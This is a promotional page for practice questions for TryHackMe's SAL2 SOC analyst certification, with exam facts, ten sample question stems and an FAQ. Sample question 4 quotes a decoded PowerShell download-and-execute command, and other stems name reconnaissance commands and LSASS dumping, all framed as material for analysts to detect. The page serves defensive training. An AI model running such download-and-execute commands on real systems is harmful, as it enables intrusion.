100+ Free SAL2 Practice Questions
Prepare for the TryHackMe Security Analyst Level 2 (SAL2) exam with instant access — no signup required.
Loading practice questions...
Explore More TryHackMe Certifications
Continue into nearby exams from the same family. Each card keeps practice questions, study guides, flashcards, videos, and articles in one place.
Key Facts: SAL2 Exam
72 hours
Exam Window
TryHackMe SAL2 exam page
12
Multi-Stage SOC Scenarios
TryHackMe SAL2 certification page
7
Questions Per Scenario
TryHackMe SAL2 blog announcement
2026
Certification Launch Year
TryHackMe
6
Core Knowledge Domains
TryHackMe SAL2 curriculum
Mid-level SOC
Target Career Level
TryHackMe SAL2 certification page
TryHackMe SAL2 (Security Analyst Level 2) is TryHackMe's advanced defensive security certification, launched in 2026. The 72-hour practical exam consists of 12 multi-stage SOC scenarios testing threat detection, DFIR, SIEM analysis, malware behavior analysis, threat intelligence, and professional reporting. This practice exam tests the knowledge concepts underlying those hands-on skills.
Sample SAL2 Practice Questions
Try these sample questions to test your SAL2 exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.
1An analyst reviewing Splunk logs notices a user account performed 47 failed logins followed by one successful login, then immediately ran 'net localgroup administrators' and 'whoami /all'. Which attack stage does this sequence most likely represent?
2When performing DFIR on a Windows system, an analyst wants to determine what processes were running at the time of a suspected compromise. Which artifact provides process creation history including command-line arguments?
3In a Wireshark capture, an analyst observes a host sending DNS TXT record queries for long, randomized subdomain strings of 60+ characters under a single parent domain at a rate of 20 queries per minute. What is the most likely malicious activity?
4An analyst is investigating a Splunk alert for an Elastic agent that flagged PowerShell executing an encoded command. The decoded base64 reveals: 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.5.12/a.ps1")'. What MITRE ATT&CK technique does this represent?
5During a Splunk investigation, which search best identifies accounts that successfully authenticated to multiple unique hosts within a 10-minute window — a pattern indicative of lateral movement?
6An analyst uses Elastic/KQL to hunt for suspicious PowerShell activity. Which KQL query correctly finds PowerShell processes where the command line contains encoded commands?
7A SOC analyst is performing static malware analysis on a suspicious PE file. Running 'strings' against the binary reveals: 'CreateRemoteThread', 'VirtualAllocEx', 'WriteProcessMemory', 'OpenProcess'. What malicious capability do these Windows API imports suggest?
8During dynamic malware analysis in a sandbox, an analyst observes the sample drop a file to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\. What is the purpose of this action?
9An analyst is writing a Sigma rule to detect LSASS memory dump attempts via procdump.exe. Which Sigma rule fields are most critical for this detection?
10A threat hunter is analyzing endpoint telemetry and finds a process 'rundll32.exe' making outbound HTTP connections to an external IP on port 443 while its parent is 'winword.exe'. What is the most likely scenario?
About the SAL2 Exam
TryHackMe Security Analyst Level 2 (SAL2) is an advanced practical certification for SOC analysts ready to operate at mid-level. The 72-hour exam presents 12 realistic, multi-stage SOC scenarios requiring candidates to investigate complex attack chains across Windows, Linux, Active Directory, cloud environments, and network traffic — then produce written reports and decision-making recommendations.
Assessment
Performance-based assessment
Time Limit
72 hours (12 SOC scenarios)
Passing Score
Not publicly disclosed
Exam Fee
Included with TryHackMe annual subscription (TryHackMe)
SAL2 Exam Content Outline
Threat Detection & Triage
Advanced alert triage, Windows/Linux log analysis (Security events, Sysmon, auditd), EDR investigation, Sigma detection rule authoring, and parent-child process anomaly detection
SIEM Investigations
Splunk SPL and Elastic KQL for advanced threat queries, cloud log analysis (Entra ID, AWS CloudTrail), EQL sequence detection, multi-source event correlation, and SIEM-based threat hunting
Network Traffic Analysis
PCAP and Zeek log analysis, C2 beaconing detection (jitter analysis, JA3/JARM fingerprinting), DNS tunneling and DGA detection, malicious HTTP profile identification
Digital Forensics & Incident Response
Memory forensics (Volatility3), NTFS MFT and MACB timestamps, Windows registry forensics, order of volatility, IR lifecycle (containment, eradication, recovery, lessons learned)
Malware Behavior Analysis
Static analysis (PE imports, entropy, strings), dynamic sandbox analysis, persistence mechanisms (startup folders, scheduled tasks, WMI subscriptions, registry), YARA rules, anti-analysis evasion
Threat Intelligence & Reporting
STIX/TAXII, MISP, TLP classification, Pyramid of Pain, MITRE ATT&CK mapping, writing executive summaries and technical IR reports, post-incident lessons learned
How to Pass the SAL2 Exam
What You Need to Know
- Passing score: Not publicly disclosed
- Assessment: Performance-based assessment
- Time limit: 72 hours (12 SOC scenarios)
- Exam fee: Included with TryHackMe annual subscription
Keys to Passing
- Work through all 100 available questions
- Review every answer and explanation
- Track weak areas and revisit them
- Use our AI tutor for tough concepts
SAL2 Study Tips from Top Performers
Frequently Asked Questions
What is the TryHackMe SAL2 exam format?
SAL2 is a practical 72-hour exam consisting of 12 multi-stage SOC scenarios. Each scenario includes 7 targeted questions probing the full attack chain (initial access through impact) plus a decision-making exercise or AI-graded incident summary report. You work in a realistic browser-based SOC environment with access to SIEM, EDR consoles, and investigation tools.
What skills does SAL2 test?
Technical skills: Windows log analysis, Active Directory investigation, Entra ID and AWS log analysis, phishing investigation, Linux attack log analysis, web attacks, network traffic analysis (PCAP/IDS), basic malware analysis, threat intelligence, detection engineering with Sigma, and SIEM/EDR triage. Non-technical skills: incident report writing, alert summarisation, MITRE ATT&CK mapping, SOC prioritisation, SLA management, and incident communication.
Is this practice exam like the real SAL2?
No — this is a multiple-choice knowledge practice exam. The real SAL2 is a practical hands-on exam where you investigate live SOC scenarios in a browser-based environment. This practice exam tests the underlying knowledge and concepts you need — SIEM queries, forensic artifact recognition, MITRE ATT&CK mapping, detection techniques — to succeed in the hands-on scenarios.
How should I prepare for SAL2?
Complete the TryHackMe SOC Level 2 learning path, which covers Advanced Splunk, Advanced ELK, Detection Engineering, Sigma rules, Threat Hunting (with EQL), Incident Response phases, Malware Analysis, and Threat Emulation (Atomic Red Team, CALDERA). Supplement with the SAL1 certification if you haven't already. Practice writing concise incident reports after each investigation exercise.
What career roles does SAL2 support?
SAL2 supports progression into mid-level SOC Analyst (Tier 2-3), Detection Engineer, Threat Hunter, and Incident Responder roles. It demonstrates job-ready skills for analysts moving beyond alert triage into proactive threat hunting, advanced SIEM investigation, and DFIR.
What is the difference between SAL1 and SAL2?
SAL1 (Security Analyst Level 1) covers foundational SOC skills — alert triage, phishing analysis, basic SIEM queries, and SOC workflows — with a 24-hour exam including 80 MCQs and 2 SOC simulations. SAL2 is advanced, covering multi-stage attack chain investigation, DFIR, malware analysis, cloud log investigation, and detection engineering, with a 72-hour practical exam of 12 complex multi-stage SOC scenarios.